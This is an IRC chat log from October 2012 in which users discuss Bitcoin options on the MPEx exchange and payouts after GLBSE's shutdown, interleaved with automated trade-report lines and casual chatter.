that the sun sets at 7am ? Oct 14 02:59:14 I don't care about the old folks Oct 14 02:59:18 hey mircea, some questions I have here Oct 14 02:59:45 I won't explain unixtime to an old folk Oct 14 02:59:48 What for? Oct 14 02:59:57 BTC-Mining shoot Oct 14 03:00:14 If I want to buy/sell options on the market Oct 14 03:01:28 I get it I have to create them with MKOPT and it always take 1 BTC in collateral Oct 14 03:01:38 either split or mkopt Oct 14 03:01:47 split makes put/call pairs and is free, mkopt charges Oct 14 03:01:56 aye, split assuming I want both Oct 14 03:02:00 k. Oct 14 03:02:27 Now Oct 14 03:02:31 also, calls always take 1btc. puts take varying. Oct 14 03:03:04 [MPEX] [S.MPOE] 3600 @ 0.00041008 = 1.4763 BTC [-] Oct 14 03:03:06 [MPEX] [S.MPOE] 8100 @ 0.00040888 = 3.3119 BTC [-] Oct 14 03:03:17 Suppose I sell it for a fraction of it's value on the market. What happens with the escrowed BTC? Oct 14 03:03:55 nothing. Oct 14 03:04:32 So... Oct 14 03:04:51 escrowed btc waits there till option is exercised. Oct 14 03:04:58 at which point you get w/e is left. Oct 14 03:05:14 aye, so it's returned at the end of the month, or part of it. Oct 14 03:05:33 yea, if option expires worthless you get it all back Oct 14 03:06:06 there's for instance a guy keeps making huge bulks of c10t s Oct 14 03:06:24 each costs 1btc to make and sells for w/e, .9x Oct 14 03:06:29 oh come on mircea_popescu Oct 14 03:06:43 and at the end of the month he gets something, 0.0x or more possibly if the price goes down Oct 14 03:06:45 tell everyone how you dip into funds Oct 14 03:06:52 for hookers and blow Oct 14 03:07:01 jcpham lol no more cp ? now it's h&b ? Oct 14 03:07:28 ok i made that up. i admit it Oct 14 03:07:37 which one lol Oct 14 03:07:47 hurrr Oct 14 03:09:48 oh... so by making a split, I get twice the BTC put up front in escrow with no fees. Oct 14 03:10:10 But if I don't sell like I want, if price goes up/down, no loss Oct 14 03:11:14 no ? Oct 14 03:11:36 you still pay the full escrow on both ends Oct 14 03:12:01 hmm? I thought split had no fees? Oct 14 03:12:07 it doesn't. Oct 14 03:12:20 you put up 20.4 btc get 20 call contracts, of your choosing Oct 14 03:12:30 you put up 20 btc you get 10 call contracts and x put contracts of your chosing Oct 14 03:12:35 where x varies on the strike you pick Oct 14 03:12:45 right at the money x = 10 Oct 14 03:13:05 Exactly Oct 14 03:13:10 a ok. Oct 14 03:13:13 So if you make a split, price moves and you don't sell any contract like you wanted, at the end of the month, it results in a 0 BTC loss or gain. Oct 14 03:13:14 then yes, exactly :p Oct 14 03:13:19 yup Oct 14 03:13:34 Seems good, you put more BTC in escrow Oct 14 03:13:43 and if you sell the out of the money side and it stays out of the money you make that sale profit Oct 14 03:13:50 But if you only want to sell one way, the 2% fee saved can go a long way Oct 14 03:14:06 well, yes, it practically boils down to, a little overescrow. Oct 14 03:14:17 mostly to try and prevent too curageous speculation. Oct 14 03:14:33 mpex doing it's part to promote financial responsibility. Oct 14 03:16:14 but anyway, consider the case you have 10k btc and want to ensure that they don't go under 100k usd. Oct 14 03:17:00 you make 5k atm calls/puts, you sell the calls, keep the puts. if price goes down in fact you make a decent profit Oct 14 03:17:26 obviously if it goes up you can make a loss. but you can adjust the % you sell to suit your expectations Oct 14 03:17:52 aye Oct 14 03:19:01 i'm kinda proud of the fact that mpex allows not only option buying, but also option writing, without any unbound risk. Oct 14 03:19:13 it should be a great price stabilisation device. Oct 14 03:30:15 [MPEX] [S.MPOE] 21200 @ 0.00040933 = 8.6778 BTC [+] Oct 14 03:39:55 http://onlyonetv.com/2011/05/uir1-1-universal-practices-of-peace-and-the-eight-intelligences/ something awful delivers. Oct 14 03:40:34 so, if someone exercies an option at a profit... collateral is lost eh. Oct 14 03:42:04 well, some of it. Oct 14 03:42:38 aye, proportionally Oct 14 03:43:27 So, suppose I create a call (1 BTC escrow) struck at 20. Price is 12 USD/BTC and stays 12 USD/BTC Oct 14 03:44:08 Technically the call has a negative value of -0.6666666 Oct 14 03:44:34 options never have negative value. call is worth 0 Oct 14 03:45:37 hmm... right. Because you only lose from escrow what the other party exercises. Oct 14 03:45:59 So if it's negative, the exercising party gains zero and the BTC is returned instead. Oct 14 03:47:14 ya Oct 14 03:47:42 that's why they are called options. they convey the right but not the obligation. Oct 14 03:48:03 Indeed Oct 14 03:50:41 Slightly confusing at first but very interesting. I should try and start playing with those. Oct 14 03:54:05 Last question. We need to put strike/spot BTC for a put option. Oct 14 03:54:34 So a struck at 20 would require if price was 12, 1.66 BTC Oct 14 03:54:54 Is that right? Oct 14 03:55:51 [MPEX] [S.MPOE] 20466 @ 0.00040933 = 8.3773 BTC [+] Oct 14 03:57:34 um Oct 14 03:58:04 split works automatically, you declare the capital and the option Oct 14 03:58:17 it rounds issuance down, so you could end up with 0 puts if the strike is high Oct 14 03:59:59 Aye, but making a put contract with strike of 20 when BTC is worth 12, would require 1.66666... BTC? Oct 14 04:00:26 yea, something like that. Oct 14 04:01:42 which is 20 / 12... but Oct 14 04:02:14 Supposing price drops to 1 USD/BTC Oct 14 04:02:57 Wouldn't the exercising value for the put @ 20 strike be 19 BTC? Oct 14 04:03:06 Which is over 10x the collateral? Oct 14 04:05:32 theoretically, yes. Oct 14 04:05:43 you'd just not get anything out of your colateral in practice. Oct 14 04:06:23 So how would that work? Oct 14 04:07:51 well, it'd work cause at the time you posted the collateral it was in fact worth enough to cover in dollahs. Oct 14 04:08:32 but... it would have to be converted to dollars to work. Oct 14 04:09:09 yea. Oct 14 04:09:52 Which means even if the contract is not exercised, there could be a loss in BTC if the price increase instead for the contract maker. Oct 14 04:10:19 or a gain. Oct 14 04:10:31 aye Oct 14 04:10:45 but for simplicity's sake all those things happen behind the scenes. Oct 14 04:15:00 ok, but let's say BTC price is 12 USD and I make a split at strike 12 for 100 contracts. I put 200 in collateral. Now let's say price goes to 20. Oct 14 04:15:31 I sell both 100 put and 100 call contracts. Oct 14 04:16:47 I lose 0.4 BTC per call struck at 12 exercised for 40 BTC loss. Other guy doesn't redeem his option because it's negative. Oct 14 04:16:56 puts are worthless. calls are worth ~.4 each Oct 14 04:17:00 you get ~160 btc back Oct 14 04:17:20 But the 100 BTC for the PUT should have been converted to USD. Oct 14 04:17:57 but for simplicity's sake all those things happen behind the scenes. Oct 14 04:18:04 So should be worth 1200 / 20 = 60 BTC, or another 0.4 BTC loss. Oct 14 04:19:29 correspondingly, if btc went to 10 Oct 14 04:19:43 you'd lose nothing on the calls and .2 on the puts, coming out to 180 btc. Oct 14 04:19:58 which are now 1800 usd instead of the 2400 they were. Oct 14 04:20:57 [MPEX] [S.MPOE] 29800 @ 0.00040952 = 12.2037 BTC [+] Oct 14 04:21:55 Aye... but now let's assume the opposite in the extreme. Price goes down to 0.01 USD... The calls are worth nothing so are not exercised. So you get back 100 BTC. However... Puts are worth 1199 BTC and are exercised, so you need 119900 BTC to pay out with 100 BTC only in collateral. Oct 14 04:22:37 i need 119900 new btc. as far as you're concerned, you get 100 btc back Oct 14 04:23:16 Sounds messed up. Basically the exchange has absorbs the losses from unexercised contracts which goes over the collateral. Oct 14 04:23:41 Shouldn't calls require BTC collateral (like they do) and put require USD collateral? Oct 14 04:23:48 nah. Oct 14 04:27:17 It seems tho that logically, that's how they should be. Because unexercised contracts returns the escrow and a PUT technically is going long with USD, so if that contract makes a profit, it makes it on USD valuating, so escrow should be in USD Oct 14 04:29:35 except mpex works in bitcoin. why should i bother the customer with filthy fiat ? Oct 14 04:32:26 "Even if they had every regulation in place, it still has other flaws, like being deflationary and non-reversible. The only time bitcoins will be "stable" is when the number of users drops very low" Oct 14 04:32:39 god i love the opinions of the incompetent on matters they don't understand Oct 14 04:32:51 sex has also flaws. it is pleasurable and makes time zip by! Oct 14 04:45:54 Yeah, but it basically means every time bitcoins value go down by a lot, MPEx has to pay for it because the escrow is not USD Oct 14 04:46:26 [MPEX] [S.MPOE] 438 @ 0.00040952 = 0.1794 BTC [+] Oct 14 04:46:32 So basically, I could just make splits safely and indefinitly and any time BTC price would crash, I'd profit. Oct 14 04:47:22 Because I can't lose more than escrow but can gain more than escrow Oct 14 04:47:25 i don't follow how you profit ? Oct 14 04:47:33 you mean if you sell them ? Oct 14 04:49:08 Since there's no fee for splits and assuming I have 2 account Oct 14 04:49:19 yea... Oct 14 04:50:34 Seems bad Oct 14 04:51:38 you still haven't produced a working scenario. Oct 14 04:51:51 so, you split a bitcoin, get some calls and some puts. nwo what ? Oct 14 04:52:12 Let me make 1 million such contract then crash the market price Oct 14 04:52:22 Sounds like fun Oct 14 04:53:11 you need 1 btc in cash to make them. Oct 14 04:53:32 you crash the price with your other million. since we now have superpowers, i buy your other million. Oct 14 04:53:35 now what ? Oct 14 04:53:38 I know, I don't have the funds. Just daydreaming Oct 14 04:54:08 but i mean, if you're daydreaming it'd be cheaper to buy a buncha calls and push the price up lol Oct 14 04:54:18 i mean... it's the nature of options, they lend themselves to daydreaming. Oct 14 04:54:35 I'll strike them at 20 for 1.66 million, crash price to 4 BTC with a few 100Ks, redeem 1 million x 4 BTC. I get 4 million BTC, lose 1.66 collateral and a few 100Ks Oct 14 04:55:17 let's do the math. Oct 14 04:55:40 1.66mn btc in escrow -> 1 mn puts struck at 20. Oct 14 04:55:44 ;;bids 4 Oct 14 04:55:45 aye Oct 14 04:55:46 There are currently 209213.01 bitcoins demanded at or over 4.0 USD, worth 1651453.94475 USD in total. Oct 14 04:56:12 say 333k btc sold at ~5 or so on avg to crash it all to 4. Oct 14 04:56:17 +209k I have to sell at a loss, let's round it up to 1.9 mn Oct 14 04:56:27 or yeah, 2mn Oct 14 04:56:45 now, of your original 2mn btc you have 1,666mn usd and 1.666 mn btc Oct 14 04:56:51 the later held in escrow. Oct 14 04:57:00 yup Oct 14 04:57:06 the value of those options is 16/4 = 2.5 each Oct 14 04:57:17 .py 1.66 * 2.5 Oct 14 04:57:18 4.15 Oct 14 04:57:41 so you cash 4.15mn btc on the options, lose the escrow. you now have 4.15mn btc worth 4 each and 1.66mn usd Oct 14 04:58:08 considering you started with 2mn btc worth ~24mn usd each and now have ~1.66mn usd and another 1.66mn in btc Oct 14 04:58:17 you've done fucked yourself out of 80% of your value. Oct 14 04:59:05 this all notwithstanding that i wouldn't allow the insanity in the first place, just for the sake of argument. Oct 14 04:59:16 No, because there was no USD in escrow and you have to buy those to pay me. I'd like to see that not switching the price back far over it's original value. Oct 14 04:59:28 I'd basically bankrupt you. Oct 14 05:00:31 well, you already sold it to me lol. Oct 14 05:00:36 remember, sold ~5 ? Oct 14 05:01:26 Eh, assuming you had the USD for it. Oct 14 05:01:46 well yes my dear BTC-Mining, in this game where you're the only one that has any btc and any usd you can ofcourse do whatever you like lol Oct 14 05:01:56 kinda why we even try to amass resources, this. Oct 14 05:02:27 But even so, you paid a lot for them and have to give them to the market manipulator along with his own escrow + extra. Oct 14 05:02:54 I only sold 333k + gave 1.66mn in esscrow and you have to give 4 mn Oct 14 05:03:46 But even on a low scale with 1 or 2 contract made by split. Oct 14 05:04:18 No fee Oct 14 05:04:21 then push to second account Oct 14 05:04:53 price movement loss/win evens out the execution of said contracts Oct 14 05:05:08 Since they're opposite Oct 14 05:05:29 Until there's a large drop, at which point 1st account lose escrow and 2nd account makes a profit. Oct 14 05:05:34 well what can i say, i'm guessing you should try this ? Oct 14 05:05:54 Well that's assuming bitcoins wouldn't keep up the deflationary curve... Oct 14 05:05:54 keep btc locked up in the hopes that maybe price collapses and you get a lot more of the collapsed currency Oct 14 05:06:15 but anyway, a conversation we should continue at a later time, i gtg now. Oct 14 05:06:18 But if you have nothing to do with your bitcoins, seems like something I'd suggest. Oct 14 05:06:30 No, I'd recommend investing the coins if possible. Oct 14 05:06:47 Otherwise, you can keep them valuating safely Oct 14 05:07:03 while still retaining a BTC gain for free should market collapse. Oct 14 05:11:38 [MPEX] [S.MPOE] 8334 @ 0.00040933 = 3.4114 BTC [-] Oct 14 05:11:39 [MPEX] [S.MPOE] 17827 @ 0.00040908 = 7.2927 BTC [-] Oct 14 05:36:47 [MPEX] [S.MPOE] 20900 @ 0.00040908 = 8.5498 BTC [-] Oct 14 05:49:58 Damn... of course I didn't get my BTC yet... Oct 14 05:50:15 My blockchain is 2 days old Oct 14 05:50:24 Seems my firewall decided to block it... Oct 14 05:50:32 Bitcoin-QT Oct 14 05:52:22 Going to eat something and will report back afterward if I got paid already Oct 14 06:01:55 [MPEX] [S.MPOE] 26862 @ 0.00040952 = 11.0005 BTC [+] Oct 14 06:01:56 [MPEX] [S.MPOE] 22538 @ 0.00040967 = 9.2331 BTC [+] Oct 14 06:26:58 [MPEX] [S.MPOE] 6173 @ 0.00040908 = 2.5253 BTC [-] Oct 14 06:26:58 [MPEX] [S.MPOE] 11416 @ 0.00040888 = 4.6678 BTC [-] Oct 14 06:27:01 [MPEX] [S.MPOE] 811 @ 0.00040806 = 0.3309 BTC [-] Oct 14 06:41:17 Well, I'm glad to report GLBSE paid me out too Oct 14 06:41:39 what about the stock holdings? Oct 14 06:41:48 nothing as of yet Oct 14 06:42:00 okay Oct 14 06:42:02 unsurprisin Oct 14 06:42:03 thanks Oct 14 06:42:06 :( Oct 14 06:42:07 after everyone villified nefario Oct 14 06:42:08 But at least we now know it's not like pirate only paying out small accounts Oct 14 06:42:10 saying he was going to rip them off Oct 14 06:42:17 hes come through and paid out Oct 14 06:42:40 uh sure - what about the stock holdings? Oct 14 06:42:53 uh its a huge task to pay out thousands of btc Oct 14 06:42:58 perhaps he want sto make it gets done properly Oct 14 06:43:03 338 BTC received here, in 3 payments Oct 14 06:43:07 or perhaps you can let him know its ok if he sends your BTC to someone else Oct 14 06:43:07 ? Oct 14 06:43:19 Which totals to what my 3 subaccounts should have had Oct 14 06:43:31 and even extra Oct 14 06:43:36 im wondering how div payments are gonna work Oct 14 06:43:46 Which might or might not be unnaccounted for dividends Oct 14 06:43:56 Manual Oct 14 06:44:02 i meant for m Oct 14 06:44:02 e Oct 14 06:44:09 i have brendio doing a passthru asset Oct 14 06:44:22 Well Brendio will pay manually Oct 14 06:44:23 technically i just pay divs to him and he dulls them out Oct 14 06:44:25 but Oct 14 06:44:30 no offense to brendio but Oct 14 06:44:33 how do we keep him honest Oct 14 06:44:36 without glbse Oct 14 06:44:55 i just want to make sure when i pay out 60 btc in divs Oct 14 06:44:59 they actually get where theyre meant to go Oct 14 06:45:18 Eh... I expect a lot of people going around saying they haven't been paid and had 2 billion shares of this and that. Oct 14 06:45:28 That's going to be harsh Oct 14 06:45:38 indeed Oct 14 06:51:21 what are you worried for rg? Oct 14 06:51:32 im worried then when i pay my share holders Oct 14 06:51:35 they dont get the payout Oct 14 06:51:45 s/then/that Oct 14 06:52:03 [MPEX] [S.MPOE] 21100 @ 0.00040967 = 8.644 BTC [+] Oct 14 06:52:04 most of them have given me a lot of money Oct 14 06:52:04 well Oct 14 06:52:08 its a lot of money to me Oct 14 06:52:12 and id like to make sure they get their cut Oct 14 06:52:38 in reality our total taken in from the asset is probably $4k Oct 14 06:52:43 but that's a lot of money to me Oct 14 06:52:44 andm ost people Oct 14 06:53:45 but there could be a scenario where some shareholders can't prove they own shares Oct 14 06:53:50 some may even forfeit their shares Oct 14 06:54:06 hehe Oct 14 06:54:08 im ok with that Oct 14 06:54:09 :P Oct 14 06:54:15 if people wanna give back their shares Oct 14 06:54:17 by all means Oct 14 06:54:17 :P Oct 14 06:54:24 "unclaimed shares" Oct 14 06:54:34 Well I'm sure not 100% will claim their account Oct 14 06:54:42 It's quite sad, really Oct 14 06:54:59 it's an inevitability of an assets exchange shutting down improperly Oct 14 06:55:07 it would be dumb for them not to Oct 14 06:55:23 if all the users had gpg key fingerprints, it would be a no brainer Oct 14 06:55:59 I mean I'm not one to complain though. Oct 14 06:56:12 and damn, I'll need to put a keylock on my bedroom's door Oct 14 06:56:36 ? Oct 14 06:56:50 my door has a lock but its a joke Oct 14 06:56:59 its the one you can stick an allen wrench into Oct 14 06:57:00 and pop it Oct 14 06:57:03 LOL Oct 14 06:57:17 Because I don't like drunken people crashing in my bed. Oct 14 06:57:30 why do drunk people crash in your bed? Oct 14 06:57:36 or attempt to Oct 14 06:58:27 rg: my door lock isn't a lock, it's one of those things you can turn with your nail. Not really a lock, looks like a screw from outside. Oct 14 06:59:36 Because I actually use heating in my room, and apparently it's comfortable. Apparently it's also just fun to come in to talk gibberish then fall asleept... Oct 14 07:00:14 You seem like a very tolerant person BTC-Mining Oct 14 07:00:26 They must find your room welcoming Oct 14 07:01:29 Yeah, well it's my father. I decided to go share the appartment block with him and my cousin. Oct 14 07:02:11 Duplex, 6 1/2 each Oct 14 07:03:05 Inherited by my father and uncles/aunts from the grandparents. Oct 14 07:03:25 Was pretty much a familial home long ago but was mostly empty nowadays. Oct 14 07:03:55 Better than renting. Oct 14 07:04:34 Well, it's cheaper but I'll still pay a rent soon. Oct 14 07:05:01 The 2nd floor needs to be renovated, once that's done, there will be a rent. Oct 14 07:05:25 Might even find extra roommates to fill the place. Oct 14 07:05:44 We take 3 bedrooms, there'll be 3 left. Oct 14 07:09:32 btc-mining: you could put miners in the free space Oct 14 07:12:45 Aye Oct 14 07:13:09 I think I'll go rack mounted and place miners in a datacenter however. Oct 14 07:14:12 Eh, anyone knows why addresses on a wallet cannot be deleted? Oct 14 07:15:16 I know some addresses might be needed multiple times if someone tries to repay to the same address but... why would clients block that possibility? Oct 14 07:17:39 [MPEX] [S.MPOE] 5165 @ 0.00040806 = 2.1076 BTC [-] Oct 14 07:19:26 My OCD is going haywire from not being able to delete things I don't want to use anymore =/ Oct 14 07:20:48 I need mining hardware Oct 14 07:21:16 As Ed Wuncler once said, "[bfl] is trying to buttfuck me on the time/price" Oct 14 07:33:35 BTC-Mining ok so it's paid out Oct 14 07:39:33 yup Oct 14 07:41:35 mircea_popescu: sorry for calling you "mirceau" Oct 14 07:41:48 thestringpuller lol no big deal. Oct 14 07:42:42 lol cryptoxchange is so illiquid right now 15% spread on 10 BTCs Oct 14 07:43:03 ouch Oct 14 07:43:23 more like time to market make Oct 14 07:43:25 [MPEX] [S.MPOE] 11119 @ 0.00040967 = 4.5551 BTC [+] Oct 14 07:43:26 [MPEX] [S.MPOE] 18065 @ 0.00041036 = 7.4132 BTC [+] Oct 14 07:43:27 [MPEX] [S.MPOE] 28284 @ 0.00041041 = 11.608 BTC [+] Oct 14 07:48:37 + Oct 14 08:04:13 http://trilema.com/2012/the-imbecilitarians/ if anyone feels like reading. Oct 14 08:05:32 http://boingboing.net/2012/10/13/action-philosophers.html Oct 14 08:05:32 best image ever Oct 14 08:05:32 mircea_popescu: idiocracy is the word you're looking for Oct 14 08:06:56 Diablo-D3 shhh im trying to coin Oct 14 08:06:59 aka mining. Oct 14 08:07:10 anyhow, going to bed Oct 14 08:07:11 night all Oct 14 08:11:12 [MPEX] [O.BTCUSD.P010T] 30 @ 0.03 = 0.9 BTC [+] Oct 14 08:32:50 [MPEX] [O.BTCUSD.C040T] 1 @ 0.72150649 BTC [+] Oct 14 08:33:16 Nice, I sold an option Oct 14 08:33:33 haha wd Oct 14 08:33:50 I kind of have a hard time with the split function tho Oct 14 08:34:02 With the fact it auto-split the BTC Oct 14 08:34:10 so i'm noticing a pattern here. first bitcoin convention, organised by buttwrangler, before mybitcoin disaster Oct 14 08:34:24 the interscamgro convention, before glbse disaster Oct 14 08:34:35 conventions are bad for bitcoin mmkay ? Oct 14 08:34:45 BTC-Mining how do you mean ? Oct 14 08:35:03 Well I tried to split 1 and I got 1 put, 0 call Oct 14 08:35:15 and I wanted a call eh =P Oct 14 08:35:29 it's really not made for 1 btc splitting. Oct 14 08:35:31 split 1k or w/e Oct 14 08:35:37 otherwise rounding gets you Oct 14 08:35:45 Then I tried to split 2 and got 1 call, 2 put =/ Oct 14 08:35:55 sounds about right Oct 14 08:37:42 hmm... what happens if I split... then exercise the hald I don't want? Oct 14 08:38:00 Wouldn't it end up like getting a mkopt without the 2% fees? Oct 14 08:38:07 you get the exercise value Oct 14 08:39:25 aye, but the exercise value is either null (refund of escrow) or gives value + (escrow - value) Oct 14 08:39:44 Or do we still have to wait the end of the month to get the escrow? Oct 14 08:40:08 currently you do have to wait till end of month. Oct 14 08:41:32 ah, okay Oct 14 08:42:28 So no advantage to do anything split then exercise to avoid fees since we don't get it back Oct 14 08:42:58 "currently" should stay like this Oct 14 08:45:24 prolly. Oct 14 08:46:32 http://news.cnet.com/8301-13578_3-57531758-38/anti-dea-rants-on-facebook-spark-criminal-prosecution/ Oct 14 08:46:40 the us is such a lovely place Oct 14 08:58:38 [MPEX] [S.MPOE] 37900 @ 0.00040806 = 15.4655 BTC [-] Oct 14 08:59:17 hmm, so MKTOP will always cost 0.02 BTC per call and 2% of (PUT STRIKE / CURRENT MARKET) Oct 14 08:59:29 for PUT Oct 14 08:59:46 Seems a bit expensive for the CALLS Oct 14 08:59:49 But eh Oct 14 09:00:42 Where is the current market price fetched? Oct 14 09:02:14 http://polimedia.us/bitcoin/faq.html#25 Oct 14 09:06:24 ah, thanks Oct 14 09:06:28 Is it fetched live for each MKOPT? Oct 14 09:06:42 it doesn't change that fast you know. Oct 14 09:07:00 Well, not sure how frequently they change it Oct 14 09:12:30 ;;bc,blocks Oct 14 09:12:31 203199 Oct 14 09:12:47 ;;bc Oct 14 09:12:47 Error: "bc" is not a valid command. Oct 14 09:12:52 ;;bc,total Oct 14 09:12:52 Error: "bc,total" is not a valid command. Oct 14 09:13:09 ;;bc,help Oct 14 09:13:09 Alias bc,24hprc, Alias bc,avgprc, Alias bc,bitpenny, Alias bc,blockdiff, Alias bc,blocks, Alias bc,bounty, Alias bc,btcguild, Alias bc,calc, Alias bc,calcd, Alias bc,convert, Alias bc,deepbit, Alias bc,diff, Alias bc,diffchange, Alias bc,eligius, Alias bc,estimate, Alias bc,fx, Alias bc,gen, Alias bc,gend, Alias bc,halfreward, Alias bc,help, Alias bc,hextarget, Alias bc,intersango, Alias (2 more messages) Oct 14 09:24:44 [MPEX] [S.MPOE] 3382 @ 0.00040983 = 1.386 BTC [+] Oct 14 09:32:27 https://bitcointalk.org/index.php?topic=20535.msg285717#msg285717 old mtgox threads kick ass Oct 14 09:39:29 My options spreadhseet now autofetch the data from bitcoinchart Oct 14 09:42:44 cool Oct 14 09:44:18 I'm now well tooled to quickly check margin vs fee for MKOPT compared to current bids Oct 14 09:45:00 Will rack you some 2% fees Oct 14 09:45:06 [MPEX] [S.MPOE] 10516 @ 0.00041041 = 4.3159 BTC [+] Oct 14 09:45:06 [MPEX] [S.MPOE] 18401 @ 0.00041054 = 7.5543 BTC [+] Oct 14 09:45:08 [MPEX] [S.MPOE] 25400 @ 0.000411 = 10.4394 BTC [+] Oct 14 09:45:09 [MPEX] [S.MPOE] 46124 @ 0.00041198 = 19.0022 BTC [+] Oct 14 09:45:10 [MPEX] [S.MPOE] 21500 @ 0.00041222 = 8.8627 BTC [+] Oct 14 09:45:11 [MPEX] [S.MPOE] 45399 @ 0.00041238 = 18.7216 BTC [+] Oct 14 09:45:12 [MPEX] [S.MPOE] 49900 @ 0.00041265 = 20.5912 BTC [+] Oct 14 09:45:13 [MPEX] [S.MPOE] 53001 @ 0.00041351 = 21.9164 BTC [+] Oct 14 09:45:15 [MPEX] [S.MPOE] 12917 @ 0.00041479 = 5.3578 BTC [+] Oct 14 09:45:16 [MPEX] [S.MPOE] 27200 @ 0.00041609 = 11.3176 BTC [+] Oct 14 09:45:16 [MPEX] [S.MPOE] 30600 @ 0.0004177 = 12.7816 BTC [+] Oct 14 09:45:17 [MPEX] [S.MPOE] 25000 @ 0.00041876 = 10.469 BTC [+] Oct 14 09:45:18 [MPEX] [S.MPOE] 434042 @ 0.00042 = 182.2976 BTC [+] Oct 14 09:45:24 whee Oct 14 09:45:46 Someone saw massive profit from 2% fees? Let me start trading first! Oct 14 09:46:03 lol Oct 14 09:59:10 [MPEX] [O.BTCUSD.P010T] 25 @ 0.0213913 = 0.5348 BTC [-] Oct 14 10:25:03 [MPEX] [S.MPOE] 9900 @ 0.00041239 = 4.0827 BTC [-] Oct 14 10:25:04 [MPEX] [S.MPOE] 27818 @ 0.00041474 = 11.5372 BTC [+] Oct 14 10:43:55 well, goodbye everyone Oct 14 10:47:33 [MPEX] [S.MPOE] 12982 @ 0.00041474 = 5.3842 BTC [+] Oct 14 10:47:35 [MPEX] [S.MPOE] 107018 @ 0.00042 = 44.9476 BTC [+] Oct 14 10:57:56 [MPEX] [O.BTCUSD.P020T] 13 @ 0.02723297 = 0.354 BTC [+] Oct 14 10:57:57 [MPEX] [O.BTCUSD.P020T] 8 @ 0.02582572 = 0.2066 BTC [-] Oct 14 10:57:58 [MPEX] [O.BTCUSD.P020T] 39 @ 0.02274183 = 0.8869 BTC [-] Oct 14 10:57:59 [MPEX] [O.BTCUSD.P020T] 47 @ 0.01999854 = 0.9399 BTC [-] Oct 14 10:58:00 [MPEX] [O.BTCUSD.P020T] 30 @ 0.01744936 = 0.5235 BTC [-] **** BEGIN LOGGING AT Sun Oct 14 19:36:43 2012 Oct 14 19:42:03 [MPEX] [S.MPOE] 1045 @ 0.00040596 = 0.4242 BTC [-] Oct 14 19:42:04 [MPEX] [S.MPOE] 3000 @ 0.00040588 = 1.2176 BTC [-] Oct 14 19:42:05 [MPEX] [S.MPOE] 10000 @ 0.00040573 = 4.0573 BTC [-] Oct 14 19:42:06 [MPEX] [S.MPOE] 19200 @ 0.00040566 = 7.7887 BTC [-] Oct 14 19:42:08 [MPEX] [S.MPOE] 855 @ 0.00040515 = 0.3464 BTC [-] Oct 14 19:44:03 [MPEX] [S.MPOE] 13800 @ 0.00040657 = 5.6107 BTC [+] Oct 14 19:44:04 [MPEX] [S.MPOE] 53300 @ 0.00040669 = 21.6766 BTC [+] Oct 14 19:44:06 [MPEX] [S.MPOE] 40020 @ 0.00040732 = 16.3009 BTC [+] Oct 14 19:44:07 [MPEX] [S.MPOE] 4000 @ 0.00040901 = 1.636 BTC [+] Oct 14 19:44:08 [MPEX] [S.MPOE] 11803 @ 0.00041087 = 4.8495 BTC [+] Oct 14 19:44:09 [MPEX] [S.MPOE] 12859 @ 0.00041138 = 5.2899 BTC [+] Oct 14 19:44:10 [MPEX] [S.MPOE] 29592 @ 0.0004121 = 12.1949 BTC [+] Oct 14 19:44:12 [MPEX] [S.MPOE] 19900 @ 0.00041241 = 8.207 BTC [+] Oct 14 19:44:12 [MPEX] [S.MPOE] 3648 @ 0.0004144 = 1.5117 BTC [+] Oct 14 19:44:13 [MPEX] [S.MPOE] 3295 @ 0.00041463 = 1.3662 BTC [+] Oct 14 19:44:14 [MPEX] [S.MPOE] 51100 @ 0.00041695 = 21.3061 BTC [+] Oct 14 19:44:15 [MPEX] [S.MPOE] 7143 @ 0.00041789 = 2.985 BTC [+] Oct 14 19:44:16 [MPEX] [S.MPOE] 4097 @ 0.00041864 = 1.7152 BTC [+] Oct 14 19:44:17 [MPEX] [S.MPOE] 9500 @ 0.00041903 = 3.9808 BTC [+] Oct 14 19:44:18 [MPEX] [S.MPOE] 1735943 @ 0.00042 = 729.0961 BTC [+] Oct 14 19:47:40 [MPEX] [S.DICE] 180 @ 0.0032 = 0.576 BTC [-] Oct 14 19:54:17 Azelphur: did i receive anything from glbse yet? Yes, the btc which was in the mpoe.etf account. Nothing more. Oct 14 19:54:41 smickles: aww :( Oct 14 19:55:38 take a look at this: http://www.youtube.com/watch?v=MrIxH6DToXQ live Red Bull Stratos - freefall from the edge of space Oct 14 19:56:46 smickles not the otjher, ss or what was it ? Oct 14 19:58:35 http://thehill.com/blogs/hillicon-valley/technology/261863-us-ambassador-warns-internet-fee-proposal-gaining-momentum-abroad hey, they still hope to tax it Oct 14 19:59:40 mircea_popescu: not the ojher (ss) and not my brokerage account yet Oct 14 19:59:47 "brokerage" Oct 14 19:59:50 wow !? Oct 14 19:59:55 so in the end just some accts ? Oct 14 20:00:16 [MPEX] [O.BTCUSD.C130T] 3 @ 0.08225983 = 0.2468 BTC [-] Oct 14 20:00:32 seems so Oct 14 20:01:05 this may indicate that there is a minimum balance to have inorder to be paid Oct 14 20:01:22 the SS account only had a couple hundred satoshi Oct 14 20:02:02 o o Oct 14 20:02:09 ya i think multiple ppl reported roundings Oct 14 20:02:26 so basically, all accts were paid their btc balance is the correct statement Oct 14 20:03:22 if we consider two of my accounts to be 'below the round' i suppose we can say all my accounts were paid their btc Oct 14 20:03:50 mircea_popescu: this would indicate that over 3/4 of mpoe.etf shareholders got out before the fall Oct 14 20:04:33 smickles pretty good then Oct 14 20:05:18 very sloppy way to close things, ignoring some accts for being below the round, obviously Oct 14 20:05:22 but in the circumstances... Oct 14 20:08:59 in 'principal', it's wrong to round off some accounts like that Oct 14 20:16:40 principle lol Oct 14 20:19:24 heh, i thoung you might like that one ;) Oct 14 20:19:29 *thought Oct 14 20:19:48 sup Oct 14 20:19:58 nm here, you? Oct 14 20:20:03 ;;ticker Oct 14 20:20:04 Best bid: 11.95, Best ask: 11.9625, Bid-ask spread: 0.01250, Last trade: 11.9625, 24 hour volume: 12355, 24 hour low: 11.8502, 24 hour high: 12 Oct 14 20:20:09 ;;bc,24hprc Oct 14 20:20:11 11.85 Oct 14 20:20:22 tired, really Oct 14 20:20:30 and my box failed to unhibernate correctly Oct 14 20:21:36 no news from captain jackass? Oct 14 20:21:50 I seem to have received some btc Oct 14 20:22:10 and had a couple of account counted to be worth too little to pay back Oct 14 20:24:47 I recieved Only the btc in my private account (7.4 btc) Oct 14 20:25:33 ABM and FDBF is still pending, just like all the assets/shares I own Oct 14 20:28:06 [MPEX] [S.MPOE] 38900 @ 0.00040515 = 15.7603 BTC [-] Oct 14 20:29:57 PsychoticBoy hm, smickles got the btc from the mpoe acct. Oct 14 20:36:22 smickles: I guess the bfl bet is dead now Oct 14 20:36:35 too little to pay out on Oct 14 